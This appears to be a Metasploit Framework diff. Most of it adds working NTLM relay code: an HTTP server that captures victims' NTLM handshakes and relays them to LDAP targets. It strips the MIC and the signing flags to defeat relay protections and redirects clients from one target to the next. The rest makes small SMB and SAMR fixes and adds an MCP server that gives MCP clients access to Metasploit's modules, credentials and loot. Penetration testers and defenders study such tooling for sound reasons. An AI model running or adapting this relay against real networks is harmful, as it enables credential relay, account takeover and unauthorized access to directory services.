        client_id = Rex::Socket.to_authority(cli.peerhost, cli.peerport)
        # NTLM over HTTP is connection-oriented; keep the socket open across
        # the Type1/Type2/Type3 exchange.
        cli.keepalive = true
        relay_client = nil
        print_status("Received #{req.method} request for #{req.uri} from #{client_id}")
        # When the 307 redirect is sent to the client, it reconnects on a different port. So the relay server has to keep
        # track of the redirect URIs and associate them with the same client session. This allows the state machine to
        # continue seamlessly even if the client is bouncing between ports. Tracking the client ports but not redirect
        # URIs ends up in an infinite loop of 307 redirects because the client appears to be a new session on each
        # request. Tracking the redirect URIs allows us to correlate the new connection with the existing session
        # and avoid the redirect loop.
        @relay_clients_mutex.synchronize do
          # Try to find the client by their exact TCP connection
          if @relay_clients.key?(client_id)
            relay_client = @relay_clients[client_id]
            relay_client.cli = cli
          else
            # '/' is excluded: it is the default landing path, not a unique
            # per-session redirect token, so it cannot identify a prior session.
            previous_client_id = @relay_clients.keys.find { |k| @relay_clients[k].redirect_uri == req.uri && req.uri != '/' }
            if previous_client_id
              # Seamlessly transfer the state machine from the old port to the new port
              relay_client = @relay_clients.delete(previous_client_id)
              relay_client.cli = cli
              @relay_clients[client_id] = relay_client
            else
              # This is a truly new client session
              relay_client = Msf::Exploit::Remote::HttpServer::Relay::NTLM::ServerClient.new(
                cli,
                relay_targets,
                logger,
                datastore['RELAY_TIMEOUT']
              )
              relay_client.redirect_uri = req.uri # Track their starting path
              @relay_clients[client_id] = relay_client
            end
          end
        end
        # Run the state machine outside the mutex so slow relay I/O does not
        # block other clients' lookups.
        relay_client.process_request(req)
        @relay_clients_mutex.synchronize do
          # Drop the session once finished, but only if the table still maps
          # this id to the same object (it may have been handed off meanwhile).
          if relay_client.finished? && @relay_clients[client_id].equal?(relay_client)
            @relay_clients.delete(client_id)
          end
        end
      end

      # Sends a bare 401 response advertising NTLM authentication, prompting
      # the client to begin the NTLM handshake.
      def send_auth_challenge(cli)
        res = Rex::Proto::Http::Response.new
        res.code = 401
        res.message = "Unauthorized"
        res.headers['WWW-Authenticate'] = "NTLM"
        cli.put(res.to_s)
      end

      # Unmounts the relay resource and stops the HTTP service started by
      # start_service before delegating to the framework's cleanup.
      def cleanup
        if @http_relay_service
          @http_relay_service.remove_resource('/')
          Rex::ServiceManager.stop_service(@http_relay_service)
        end
        super
      end
    end
  end
end
@@ -0,0 +1,374 @@
# frozen_string_literal: true
module Msf::Exploit::Remote::HttpServer::Relay::NTLM
  # Handles a single inbound HTTP client connection for the NTLM relay server.
  #
  # Implements a per-connection state machine (:unauthenticated ->
  # :awaiting_type3 -> :done / :aborted). NTLM Type 1 and Type 3 messages
  # received via the HTTP Authorization header are forwarded to a relay
  # target (currently LDAP only), and the target's Type 2 challenge is
  # returned to the client. When a relay attempt fails, the client is bounced
  # to the next target via an HTTP 307 redirect, restarting the handshake.
  class ServerClient
    attr_reader :logger
    attr_accessor :cli, :state, :redirect_uri

    # @param cli the inbound HTTP client connection
    # @param relay_targets target list responding to #next and #on_relay_end
    # @param logger status/error logger supplied by the owning module
    # @param timeout [Integer] relay target connection timeout in seconds
    def initialize(cli, relay_targets, logger, timeout = 25)
      @cli = cli
      @state = :unauthenticated
      @relay_targets = relay_targets
      @logger = logger
      @timeout = timeout
      @relayed_connection = nil
      @current_target = nil
      # Handshake bookkeeping: captured type1/type2 messages plus how the
      # client wrapped them (:none = raw NTLMSSP, :gss_spnego = SPNEGO).
      @ntlm_context = {
        wrapper: :none,
        type1: nil,
        type2: nil
      }
    end

    # Dispatch an incoming HTTP request according to the current state.
    #
    # @param req the parsed client HTTP request
    def process_request(req)
      logger.print_status("Processing request in state #{state} from #{cli.peerhost}")
      auth_header = req.headers['Authorization']
      auth_type, b64_message = extract_ntlm_message(auth_header)
      parsed_ntlm = nil
      raw_ntlm_bytes = nil
      if b64_message
        begin
          raw_ntlm_bytes = unwrap_ntlm_base64(b64_message)
          parsed_ntlm = Net::NTLM::Message.parse(raw_ntlm_bytes)
        rescue ::Exception => e
          logger.print_error("Failed to parse incoming NTLM/SPNEGO message: #{e.message}")
          abort_connection("Invalid NTLM payload.")
          return
        end
      end
      case state
      when :unauthenticated
        if parsed_ntlm.nil?
          # No credentials yet: challenge the client to authenticate.
          send_401_challenge
        elsif parsed_ntlm.is_a?(Net::NTLM::Message::Type1)
          logger.print_status("Received Type 1 message from #{cli.peerhost}, attempting to relay...")
          handle_type1(raw_ntlm_bytes, parsed_ntlm, auth_type)
        else
          abort_connection("Expected No Auth or Type 1, got something else.")
        end
      when :awaiting_type3
        if parsed_ntlm && parsed_ntlm.is_a?(Net::NTLM::Message::Type3)
          logger.print_status("Received Type 3 message from #{cli.peerhost}, attempting to relay...")
          handle_type3(parsed_ntlm)
        elsif parsed_ntlm && parsed_ntlm.is_a?(Net::NTLM::Message::Type1)
          # Client abandoned the half-finished handshake; drop the stale
          # target connection and start over with the new Type 1.
          logger.print_warning("Client restarted the handshake! Resetting state to handle new Type 1...")
          @relayed_connection.disconnect! if @relayed_connection
          @relayed_connection = nil
          handle_type1(raw_ntlm_bytes, parsed_ntlm, auth_type)
        else
          abort_connection("Expected Type 3, got something else.")
        end
      when :done
        # The relay is finished for this connection, ignore further requests
      end
    end

    # Build a protocol-specific relay client for the given target.
    #
    # @return [Object, nil] the created relay client, or nil on failure
    def create_relay_client(target, timeout)
      case target.protocol
      when :ldap
        client = Msf::Exploit::Remote::Relay::NTLM::Target::LDAP::Client.create(self, target, logger, timeout)
      else
        raise RuntimeError, "unsupported protocol: #{target.protocol}"
      end
      client
    rescue ::Rex::ConnectionTimeout => e
      msg = "Timeout error retrieving server challenge from target #{target}. Most likely caused by unresponsive target"
      elog(msg, error: e)
      logger.print_error msg
      nil
    rescue ::Exception => e
      msg = "Unable to create relay to #{target}"
      elog(msg, error: e)
      logger.print_error msg
      nil
    end

    # @return [Boolean] true once this connection needs no further processing
    def finished?
      state == :done || state == :aborted
    end

    # Send an HTTP 401 offering both NTLM and Negotiate to start the handshake.
    def send_401_challenge
      res = Rex::Proto::Http::Response.new
      res.code = 401
      res.message = "Unauthorized"
      res.headers['WWW-Authenticate'] = "NTLM, Negotiate"
      res.headers['Connection'] = "Keep-Alive"
      res.headers['Content-Length'] = "0"
      res.body = ""
      cli.put(res.to_s)
    end

    # Relay the client's Type 1 message to the current target and echo the
    # target's Type 2 challenge back to the client.
    #
    # @param raw_ntlm_bytes [String] unwrapped NTLMSSP Type 1 bytes
    # @param parsed_ntlm [Net::NTLM::Message::Type1] parsed Type 1 message
    # @param auth_type [String] scheme from the Authorization header ("NTLM"/"Negotiate")
    def handle_type1(raw_ntlm_bytes, parsed_ntlm, auth_type)
      @ntlm_context[:type1] = raw_ntlm_bytes
      @current_target ||= @relay_targets.next(cli.peerhost)
      if @current_target.nil?
        logger.print_status("Target list exhausted for #{cli.peerhost}. Closing connection.")
        res = Rex::Proto::Http::Response.new
        res.code = 404
        res.message = "Not Found"
        res.headers['Connection'] = "Close"
        res.headers['Content-Length'] = "0"
        cli.send_response(res)
        @state = :done
        return
      end
      begin
        logger.print_status("Attempting to relay to #{Rex::Socket.to_authority(@current_target.ip, @current_target.port)}")
        @relayed_connection = create_relay_client(@current_target, @timeout)
        if @relayed_connection.nil?
          logger.print_error("Connection to #{@current_target.ip} failed: unable to create relay client")
          advance_to_next_target_via_redirect
          return
        end
        # Optionally strip the MIC and/or signing-related flags per the
        # target's configuration before forwarding.
        if @current_target.drop_mic_and_sign_key_exch_flags
          incoming_security_buffer = do_drop_mic_and_flags(parsed_ntlm)
        elsif @current_target.drop_mic_only
          incoming_security_buffer = do_drop_mic(parsed_ntlm)
        else
          incoming_security_buffer = parsed_ntlm.serialize
        end
        relay_result = @relayed_connection.relay_ntlmssp_type1(incoming_security_buffer)
        if relay_result && relay_result.nt_status == WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
          type2_msg = relay_result.message
          @ntlm_context[:type2] = type2_msg
          # Mirror the client's original wrapping when echoing the challenge.
          if @ntlm_context[:wrapper] == :gss_spnego
            wrapped_type2 = RubySMB::Gss.gss_type2(type2_msg.serialize)
            target_type2_msg = Rex::Text.encode_base64(wrapped_type2)
            auth_header = "#{auth_type} #{target_type2_msg}"
          else
            target_type2_msg = Rex::Text.encode_base64(type2_msg.serialize)
            auth_header = "#{auth_type} #{target_type2_msg}"
          end
          logger.print_status("Received type2 from target #{@current_target.protocol}://#{Rex::Socket.to_authority(@current_target.ip, @current_target.port)}, attempting to relay back to client")
          res = Rex::Proto::Http::Response.new
          res.code = 401
          res.message = "Unauthorized"
          res.headers['WWW-Authenticate'] = auth_header
          res.headers['Connection'] = "Keep-Alive"
          res.headers['Content-Length'] = "0"
          cli.send_response(res)
          @state = :awaiting_type3
          return
        else
          logger.print_error("Target #{@current_target.ip} rejected the Type 1 message.")
        end
      rescue ::Exception => e
        logger.print_error("Connection to #{@current_target.ip} failed: #{e.message}")
      end
      # Any failure above falls through to trying the next target.
      advance_to_next_target_via_redirect
    end

    # Report the outcome of the current relay attempt back to the target list.
    #
    # @param is_success [Boolean] whether the relayed authentication succeeded
    # @param identity [String, nil] "DOMAIN\\user" extracted from the Type 3 message
    def complete_current_relay_attempt(is_success:, identity: nil)
      return unless @current_target
      @relay_targets.on_relay_end(@current_target, identity: identity, is_success: is_success)
    end

    # Relay the client's Type 3 message to finish authenticating to the target.
    #
    # @param parsed_type3 [Net::NTLM::Message::Type3] parsed Type 3 message
    def handle_type3(parsed_type3)
      relay_succeeded = false
      relay_completed = false
      # 1. Safely extract the identity from the Type 3 message early
      identity = nil
      if parsed_type3
        domain = parsed_type3.domain.to_s.force_encoding('UTF-8')
        user = parsed_type3.user.to_s.force_encoding('UTF-8')
        identity = "#{domain}\\#{user}" unless user.empty?
      end
      if @current_target.drop_mic_and_sign_key_exch_flags
        incoming_security_buffer = do_drop_mic_and_flags(parsed_type3)
      elsif @current_target.drop_mic_only
        incoming_security_buffer = do_drop_mic(parsed_type3)
      else
        incoming_security_buffer = parsed_type3.serialize
      end
      relay_result = @relayed_connection.relay_ntlmssp_type3(incoming_security_buffer)
      if relay_result && relay_result.nt_status == WindowsError::NTStatus::STATUS_SUCCESS
        relay_succeeded = true
        logger.on_ntlm_type3(
          address: @relayed_connection.target.ip,
          ntlm_type1: @ntlm_context[:type1],
          ntlm_type2: @ntlm_context[:type2],
          ntlm_type3: parsed_type3,
          service_name: 'HTTP'
        )
        if identity.blank?
          logger.print_status("Anonymous Identity - Successfully authenticated against relay target #{@relayed_connection.target.ip}")
          @relayed_connection.disconnect! if @relayed_connection
        else
          logger.print_good("Identity: #{identity} - Successfully relayed NTLM authentication to LDAP!")
          # NOTE(review): the authenticated connection is handed to the
          # on_relay_success callback and deliberately not disconnected here —
          # confirm the callback assumes ownership.
          logger.on_relay_success(relay_connection: @relayed_connection, relay_identity: identity)
        end
        @relayed_connection = nil
      else
        logger.print_error("Relayed authentication failed or was rejected by LDAP.")
        @relayed_connection.disconnect! if @relayed_connection
        @relayed_connection = nil
      end
      complete_current_relay_attempt(is_success: relay_succeeded, identity: identity)
      relay_completed = true
      @state = :done
      advance_to_next_target_via_redirect
    rescue StandardError => e
      logger.print_error("Relaying type 3 message to target #{@current_target.ip} failed: #{e.message}")
      # Only report failure if the attempt was not already reported above.
      complete_current_relay_attempt(is_success: false, identity: identity) unless relay_completed
    end

    # Move on to the next relay target (if any) by 307-redirecting the client
    # to a fresh random path, which restarts the NTLM handshake; otherwise
    # send a 404 and finish this connection.
    def advance_to_next_target_via_redirect
      @current_target = @relay_targets.next(@cli.peerhost)
      if @current_target
        random_path = "/" + Rex::Text.rand_text_alphanumeric(10)
        @redirect_uri = random_path
        @logger.print_status("Moving to next target (#{@current_target.ip}). Issuing 307 Redirect to #{random_path}")
        res = Rex::Proto::Http::Response.new
        res.code = 307
        res.message = "Temporary Redirect"
        res.headers['Location'] = random_path
        res.headers['Connection'] = "keep-alive"
        res.headers['Content-Length'] = "0"
        cli.send_response(res)
        # Reset the handshake state for the new target.
        @state = :unauthenticated
        @ntlm_context[:type1] = nil
        @ntlm_context[:type2] = nil
      else
        @logger.print_status("Target list exhausted for #{cli.peerhost}. Closing connection.")
        res = Rex::Proto::Http::Response.new
        res.code = 404
        res.message = "Not Found"
        res.headers['Connection'] = "close"
        res.headers['Content-Length'] = "0"
        cli.send_response(res)
        @state = :done
      end
    end

    # Send an HTTP 400 to the client and mark this connection aborted.
    #
    # @param reason [String] logged explanation for the abort
    def abort_connection(reason)
      logger.print_error("Aborting connection with #{cli.peerhost}: #{reason}")
      res = Rex::Proto::Http::Response.new
      res.code = 400
      res.message = "Bad Request"
      res.headers['Connection'] = "Close"
      res.headers['Content-Length'] = "0"
      res.body = ""
      cli.put(res.to_s)
      @state = :aborted
    end

    # Decode a base64 Authorization payload and unwrap GSS-SPNEGO if present,
    # recording the detected wrapper in @ntlm_context[:wrapper].
    #
    # @return [String] the raw NTLMSSP message bytes
    # @raise [ArgumentError] if the payload is neither NTLM nor SPNEGO
    def unwrap_ntlm_base64(b64_msg)
      buf = Rex::Text.decode_base64(b64_msg)
      if valid_ntlm_blob?(buf)
        @ntlm_context[:wrapper] = :none
        return buf
      end
      # Not raw NTLMSSP: check for a GSS-API/SPNEGO ASN.1 wrapper.
      gss_api = OpenSSL::ASN1.decode(buf)
      if gss_api&.tag == 0 && gss_api&.tag_class == :APPLICATION
        logger.print_status("Detected GSS-SPNEGO wrapping around the type1 NTLM message")
        @ntlm_context[:wrapper] = :gss_spnego
        return process_gss_spnego_init(buf)
      elsif gss_api&.tag == 1 && gss_api&.tag_class == :CONTEXT_SPECIFIC
        logger.print_status("Detected GSS-SPNEGO wrapping around the type3 NTLM message")
        @ntlm_context[:wrapper] = :gss_spnego
        return process_gss_spnego_targ(buf)
      end
      raise ArgumentError, "Unrecognized NTLM or SPNEGO payload"
    end

    # Split an Authorization header into its scheme and base64 payload.
    #
    # @return [Array(String, String), nil] [auth type, base64 message], or nil
    #   when the header is missing or not an NTLM/Negotiate scheme
    def extract_ntlm_message(auth_header)
      return nil unless auth_header
      # Match either "NTLM <base64>" or "Negotiate <base64>" (case insensitive)
      if auth_header =~ /^(NTLM|Negotiate)\s+(.+)$/i
        return $1, $2 # Return The auth type and the base64 message
      end
      nil
    end

    private

    # @return [Boolean] whether the blob starts with the NTLMSSP signature
    def valid_ntlm_blob?(blob)
      blob&.start_with?("NTLMSSP\x00")
    end

    # @raise [ArgumentError] if the blob lacks the NTLMSSP signature
    def validate_ntlm_blob!(blob)
      raise ArgumentError, 'The NTLM blob found was malformed' unless valid_ntlm_blob?(blob)
    end

    # Extract the NTLM token from a SPNEGO NegTokenInit (Type 1 wrapper).
    def process_gss_spnego_init(incoming_security_buffer)
      begin
        gss_init = Rex::Proto::Gss::SpnegoNegTokenInit.parse(incoming_security_buffer)
        ntlm_blob = gss_init.mech_token
        validate_ntlm_blob!(ntlm_blob)
        ntlm_blob
      rescue RASN1::ASN1Error => e
        raise ArgumentError, "Failed to parse NTLMSSP Type1 from GSS: #{e.message}"
      end
    end

    # Extract the NTLM token from a SPNEGO NegTokenTarg (Type 3 wrapper).
    def process_gss_spnego_targ(incoming_security_buffer)
      begin
        gss_targ = Rex::Proto::Gss::SpnegoNegTokenTarg.parse(incoming_security_buffer)
        ntlm_blob = gss_targ.response_token
        validate_ntlm_blob!(ntlm_blob)
        ntlm_blob
      rescue RASN1::ASN1Error, ArgumentError => e
        raise ArgumentError, "Failed to parse NTLMSSP Type3 from GSS: #{e.message}"
      end
    end

    # NOTE(review): this only logs and re-serializes the message; the MIC
    # appears to be dropped as a side effect of Net::NTLM serialization —
    # confirm against the rubyntlm serializer.
    def do_drop_mic(ntlm_message)
      logger.print_status('Dropping MIC')
      ntlm_message.serialize
    end

    # Clear the ALWAYS_SIGN / SIGN / KEY_EXCHANGE flags before re-serializing
    # (used for cross-protocol relay where signing cannot be honored).
    def do_drop_mic_and_flags(ntlm_message)
      logger.print_status('Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`')
      flags = ntlm_message.flag
      flags &= ~Net::NTLM::FLAGS[:ALWAYS_SIGN] & ~Net::NTLM::FLAGS[:SIGN] & ~Net::NTLM::FLAGS[:KEY_EXCHANGE]
      ntlm_message.flag = flags
      ntlm_message.serialize
    end
  end
end
+1 -1
View File
@@ -60,7 +60,7 @@ module Exploit::Remote::MsSamr
rescue RubySMB::Dcerpc::Error::DcerpcError => e
elog(e.message, error: e)
raise MsSamrUnexpectedReplyError, e.message
rescue RubySMB::Error::RubySMBError
rescue RubySMB::Error::RubySMBError => e
elog(e.message, error: e)
raise MsSamrUnknownError, e.message
end
@@ -55,11 +55,21 @@ module Msf::Exploit::Remote::Relay::NTLM::Target::LDAP
)
end
# Determines whether the relay connection originated from an HTTP server.
#
# @return [Boolean] true if the provider's class name contains 'httpserver', false otherwise.
def is_http_source?
  return @provider unless @provider

  @provider.class.name.to_s.downcase.include?('httpserver')
end
# @param [String] client_type3_msg
# @rtype [Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult, nil]
def relay_ntlmssp_type3(client_type3_msg)
ntlm_message = Net::NTLM::Message.parse(client_type3_msg)
if ntlm_message.ntlm_version == :ntlmv2
# Suppress the warning for HTTP sources because they can safely relay NTLMv2 type 3 messages. During testing
# non-Windows HTTP clients that sent NTLMv2 type 3 messages were able to be relayed to LDAP without issue.
if ntlm_message.ntlm_version == :ntlmv2 && !is_http_source?
logger.print_warning('Relay client\'s NTLM type 3 message is NTLMv2, relaying to LDAP will not work')
end
+1 -2
View File
@@ -1,6 +1,5 @@
# -*- coding: binary -*-
require 'rex/encoder/ndr'
require 'recog'
module Msf
module Exploit::Remote::SMB
@@ -413,7 +412,7 @@ module Msf
# Leverage Recog for SMB native OS fingerprinting
fp_match = Recog::Nizer.match('smb.native_os', fprint['native_os']) || { }
os = fp_match['os.product'] || 'Unknown'
os = fp_match['os.product'] || fp_match['os.family'] || 'Unknown'
sp = fp_match['os.version'] || ''
# Metasploit prefers 'Windows 2003' vs 'Windows Server 2003'
-1
View File
@@ -11,7 +11,6 @@ require 'monitor'
#
require 'metasploit/framework/version'
require 'rex/socket/ssl'
require 'metasploit/framework/thread_factory_provider'
module Msf
+75
View File
@@ -0,0 +1,75 @@
# frozen_string_literal: true
# Main entry point for MSF MCP Server
module Msf
  module MCP
    # Package version of the MSF MCP server.
    VERSION = '0.1.0'
  end
end
# Load the base configuration (for default paths, etc.)
require 'msf/base/config'
# Load the base Rex libraries
require 'rex/socket'
require 'rex/logging'
require 'rex/logging/log_sink'
module Msf
  module MCP
    # Log source identifier for all MCP log messages.
    LOG_SOURCE = 'mcp'

    # Log level aliases — semantic names for Rex::Logging level constants.
    LOG_DEBUG = Rex::Logging::LEV_3
    LOG_INFO = Rex::Logging::LEV_2
    LOG_WARN = Rex::Logging::LEV_1
    LOG_ERROR = Rex::Logging::LEV_0
  end
end
# Load the MCP-specific logging components
require_relative 'mcp/logging/sinks/json_stream'
require_relative 'mcp/logging/sinks/json_flatfile'
require_relative 'mcp/logging/sinks/sanitizing'
require_relative 'mcp/middleware/request_logger'
# Error classes
require_relative 'mcp/errors'
# Configuration Layer
require_relative 'mcp/config/loader'
require_relative 'mcp/config/validator'
# Security Layer
require_relative 'mcp/security/input_validator'
require_relative 'mcp/security/rate_limiter'
# Metasploit Client Layer
require_relative 'mcp/rpc_manager'
require_relative 'mcp/metasploit/messagepack_client'
require_relative 'mcp/metasploit/jsonrpc_client'
require_relative 'mcp/metasploit/client'
require_relative 'mcp/metasploit/response_transformer'
# MCP SDK
require 'mcp'
# MCP Layer
require_relative 'mcp/tools/tool_helper'
require_relative 'mcp/tools/search_modules'
require_relative 'mcp/tools/module_info'
require_relative 'mcp/tools/host_info'
require_relative 'mcp/tools/service_info'
require_relative 'mcp/tools/vulnerability_info'
require_relative 'mcp/tools/note_info'
require_relative 'mcp/tools/credential_info'
require_relative 'mcp/tools/loot_info'
require_relative 'mcp/server'
# Application Layer
require_relative 'mcp/application'
# Make logging stubs (ilog, elog, dlog, wlog)
include Rex::Logging
+334
View File
@@ -0,0 +1,334 @@
# frozen_string_literal: true
require 'msf/core/mcp'
require 'optparse'
module Msf::MCP
  # Main application class that orchestrates the MCP server startup and lifecycle
  class Application
    VERSION = '0.1.0'
    BANNER = <<~BANNER
      MSF MCP Server v#{VERSION}
      Model Context Protocol server for Metasploit Framework
    BANNER

    # For testing purposes:
    attr_reader :config, :msf_client, :mcp_server, :rate_limiter, :options, :rpc_manager

    # Initialize the application with command-line arguments
    #
    # @param argv [Array<String>] Command-line arguments
    # @param output [IO] Output stream for messages (default: $stderr)
    def initialize(argv = ARGV, output: $stderr)
      @argv = argv.dup
      @output = output
      @options = {}
      @config = nil
      @msf_client = nil
      @mcp_server = nil
      @rate_limiter = nil
      @rpc_manager = nil
    end

    # Run the application
    #
    # @return [void]
    def run
      parse_arguments
      install_signal_handlers
      load_configuration
      validate_configuration
      initialize_logger
      initialize_rate_limiter
      ensure_rpc_server
      initialize_metasploit_client
      authenticate_metasploit
      initialize_mcp_server
      start_mcp_server
    rescue Msf::MCP::Config::ValidationError, Msf::MCP::Config::ConfigurationError => e
      handle_configuration_error(e)
    rescue Msf::MCP::Metasploit::ConnectionError => e
      handle_connection_error(e)
    rescue Msf::MCP::Metasploit::APIError => e
      handle_api_error(e)
    rescue Msf::MCP::Metasploit::AuthenticationError => e
      handle_authentication_error(e)
    rescue Msf::MCP::Metasploit::RpcStartupError => e
      handle_rpc_startup_error(e)
    rescue StandardError => e
      handle_fatal_error(e)
    end

    # Shutdown the application gracefully
    #
    # Performs cleanup operations before process termination:
    # - Logs shutdown event via Rex
    # - Closes MCP server and Metasploit client connections
    # - Cleans up resources
    #
    # @param signal [String] Signal name (e.g., 'INT', 'TERM')
    # @return [void]
    def shutdown(signal = 'INT')
      ilog({
        message: 'Shutting down',
        context: { signal: "SIG#{signal}" }
      }, LOG_SOURCE, LOG_INFO)
      @mcp_server&.shutdown
      @rpc_manager&.stop_rpc_server
      @output.puts "\nShutdown complete"
    end

    private

    # Parse command-line arguments
    #
    # @return [void]
    def parse_arguments
      parser = OptionParser.new do |opts|
        opts.banner = BANNER + "\nUsage: msfmcp [options]"
        opts.on('--config PATH', 'Path to configuration file') do |path|
          @options[:config_path] = File.expand_path(path)
        end
        opts.on('--enable-logging', 'Enable file logging') do
          @options[:enable_logging_cli] = true
        end
        opts.on('--log-file PATH', 'Log file path (overrides config file)') do |path|
          @options[:log_file_cli] = path
        end
        opts.on('--user USER', 'MSF API username (for MessagePack auth)') do |user|
          @options[:msf_user_cli] = user
        end
        opts.on('--password PASS', 'MSF API password (for MessagePack auth)') do |password|
          @options[:msf_password_cli] = password
        end
        opts.on('--no-auto-start-rpc', 'Disable automatic RPC server startup') do
          @options[:no_auto_start_rpc] = true
        end
        opts.on('--mcp-transport TRANSPORT', 'MCP server transport type (\'stdio\' or \'http\')') do |transport|
          @options[:mcp_transport] = transport
        end
        opts.on('-h', '--help', 'Show this help message') do
          @output.puts opts
          exit 0
        end
        opts.on('-v', '--version', 'Show version information') do
          @output.puts "msfmcp version #{VERSION}"
          exit 0
        end
      end
      parser.parse!(@argv)
    end

    # Register a Rex log source when logging is enabled.
    #
    # Selects a JsonFlatfile sink pointed at the configured log path and wraps it
    # with the sanitizing middleware unless sanitization has been explicitly
    # disabled in the config.
    #
    # Priority: CLI flags > config file > defaults
    #
    # @return [void]
    def initialize_logger
      return unless @options[:enable_logging_cli] || @config.dig(:logging, :enabled)

      log_file = @options[:log_file_cli] || @config.dig(:logging, :log_file)
      # Map the configured level name onto a Rex logging threshold. The
      # previous implementation assigned `level` but then re-read the config
      # (leaving the local unused) and would raise NoMethodError on a nil
      # level; `to_s` tolerates nil and unknown names fall back to INFO.
      level = @config.dig(:logging, :level)
      threshold = case level.to_s.upcase
                  when 'DEBUG'
                    Rex::Logging::LEV_3
                  when 'INFO'
                    Rex::Logging::LEV_2
                  when 'WARN'
                    Rex::Logging::LEV_1
                  when 'ERROR'
                    Rex::Logging::LEV_0
                  else
                    Rex::Logging::LEV_2 # default to INFO for unknown levels
                  end
      inner = Msf::MCP::Logging::Sinks::JsonFlatfile.new(log_file)
      sink = @config.dig(:logging, :sanitize) ? Msf::MCP::Logging::Sinks::Sanitizing.new(inner) : inner
      deregister_log_source(LOG_SOURCE) if log_source_registered?(LOG_SOURCE)
      register_log_source(LOG_SOURCE, sink, threshold)
    end

    # Install signal handlers for graceful shutdown
    #
    # NOTE(review): #shutdown performs logging and IO from within a trap
    # context; Ruby restricts Mutex use inside traps — confirm the log sinks
    # are trap-safe.
    #
    # @return [void]
    def install_signal_handlers
      Signal.trap('INT') { shutdown('INT'); exit 0 }
      Signal.trap('TERM') { shutdown('TERM'); exit 0 }
    end

    # Load configuration from file or use defaults
    #
    # @return [void]
    def load_configuration
      if @options[:config_path]
        @output.puts "Loading configuration from #{@options[:config_path]}"
        @config = Msf::MCP::Config::Loader.load(@options[:config_path])
      else
        @output.puts "No configuration file specified, using defaults"
        @config = Msf::MCP::Config::Loader.load_from_hash({})
      end
      # Apply CLI authentication overrides (highest priority)
      if @options[:msf_user_cli]
        @config[:msf_api][:user] = @options[:msf_user_cli]
      end
      if @options[:msf_password_cli]
        @config[:msf_api][:password] = @options[:msf_password_cli]
      end
      if @options[:no_auto_start_rpc]
        @config[:msf_api][:auto_start_rpc] = false
      end
      if @options[:mcp_transport]
        @config[:mcp][:transport] = @options[:mcp_transport]
      end
    end

    # Validate the loaded configuration
    #
    # @return [void]
    def validate_configuration
      @output.puts "Validating configuration..."
      Msf::MCP::Config::Validator.validate!(@config)
      @output.puts "Configuration valid"
    end

    # Initialize the rate limiter
    #
    # @return [void]
    def initialize_rate_limiter
      @rate_limiter = Msf::MCP::Security::RateLimiter.new(
        requests_per_minute: @config.dig(:rate_limit, :requests_per_minute) || 60,
        burst_size: @config.dig(:rate_limit, :burst_size)
      )
    end

    # Ensure the Metasploit RPC server is available, auto-starting if needed
    #
    # @return [void]
    def ensure_rpc_server
      @rpc_manager = Msf::MCP::RpcManager.new(
        config: @config,
        output: @output
      )
      @rpc_manager.ensure_rpc_available
    end

    # Initialize the Metasploit client
    #
    # @return [void]
    def initialize_metasploit_client
      @output.puts "Connecting to Metasploit RPC at #{@config[:msf_api][:host]}:#{@config[:msf_api][:port]}"
      @msf_client = Msf::MCP::Metasploit::Client.new(
        api_type: @config[:msf_api][:type],
        host: @config[:msf_api][:host],
        port: @config[:msf_api][:port],
        endpoint: @config[:msf_api][:endpoint],
        token: @config[:msf_api][:token],
        ssl: @config[:msf_api][:ssl]
      )
    end

    # Authenticate with Metasploit if using MessagePack
    #
    # @return [void]
    def authenticate_metasploit
      if @config[:msf_api][:type] == 'messagepack'
        @output.puts "Authenticating with Metasploit..."
        @msf_client.authenticate(@config[:msf_api][:user].to_s, @config[:msf_api][:password].to_s)
        @output.puts "Authentication successful"
      else
        @output.puts "Using JSON-RPC with token authentication"
      end
    end

    # Initialize the MCP server
    #
    # @return [void]
    def initialize_mcp_server
      @output.puts "Initializing MCP server..."
      @mcp_server = Msf::MCP::Server.new(
        msf_client: @msf_client,
        rate_limiter: @rate_limiter
      )
    end

    # Start the MCP server with configured transport
    #
    # @return [void]
    def start_mcp_server
      transport = (@config.dig(:mcp, :transport) || 'stdio').to_sym
      host = @config.dig(:mcp, :host) || 'localhost'
      port = @config.dig(:mcp, :port) || 3000
      if transport == :http
        @output.puts "Starting MCP server on HTTP transport..."
        @output.puts "Server listening on http://#{host}:#{port}"
        @output.puts "Press Ctrl+C to shutdown"
        @mcp_server.start(transport: :http, host: host, port: port)
      else
        @output.puts "Starting MCP server on stdio transport..."
        @output.puts "Server ready - waiting for MCP requests"
        @output.puts "Press Ctrl+C to shutdown"
        @mcp_server.start(transport: :stdio)
      end
    end

    # Error handlers

    # Report a configuration/validation failure and exit non-zero.
    def handle_configuration_error(error)
      @output.puts "Configuration validation failed: #{error.message}"
      exit 1
    end

    # Report a failure to reach the Metasploit RPC endpoint and exit non-zero.
    def handle_connection_error(error)
      elog({
        message: 'Connection error',
        context: { host: @config[:msf_api][:host], port: @config[:msf_api][:port] },
        exception: error
      }, LOG_SOURCE, LOG_ERROR)
      @output.puts "Connection error to Metasploit RPC at #{@config[:msf_api][:host]}:#{@config[:msf_api][:port]} - #{error.message}"
      exit 1
    end

    # Report a Metasploit API failure and exit non-zero.
    def handle_api_error(error)
      elog({ message: 'Metasploit API error', exception: error }, LOG_SOURCE, LOG_ERROR)
      @output.puts "Metasploit API error: #{error.message}"
      exit 1
    end

    # Report an authentication failure (includes the username) and exit non-zero.
    def handle_authentication_error(error)
      elog({
        message: 'Authentication error',
        context: { username: @config[:msf_api][:user].to_s },
        exception: error
      }, LOG_SOURCE, LOG_ERROR)
      @output.puts "Authentication error (username: #{@config[:msf_api][:user]}): #{error.message}"
      exit 1
    end

    # Report an RPC auto-start failure and exit non-zero.
    def handle_rpc_startup_error(error)
      elog({ message: 'RPC startup error', exception: error }, LOG_SOURCE, LOG_ERROR)
      @output.puts "RPC startup error: #{error.message}"
      exit 1
    end

    # Catch-all for unexpected startup failures; prints a short backtrace.
    def handle_fatal_error(error)
      elog({ message: 'Fatal error during startup', exception: error }, LOG_SOURCE, LOG_ERROR)
      @output.puts "Fatal error: #{error.message}"
      @output.puts error.backtrace.first(5).join("\n") if error.backtrace
      exit 1
    end
  end
end
+123
View File
@@ -0,0 +1,123 @@
# frozen_string_literal: true
require 'yaml'
module Msf::MCP
  module Config
    # Loads MCP server configuration from YAML (or a plain hash), applying
    # defaults and environment-variable overrides.
    class Loader
      # Load configuration from YAML file with environment variable overrides
      #
      # @param file_path [String] Path to YAML configuration file
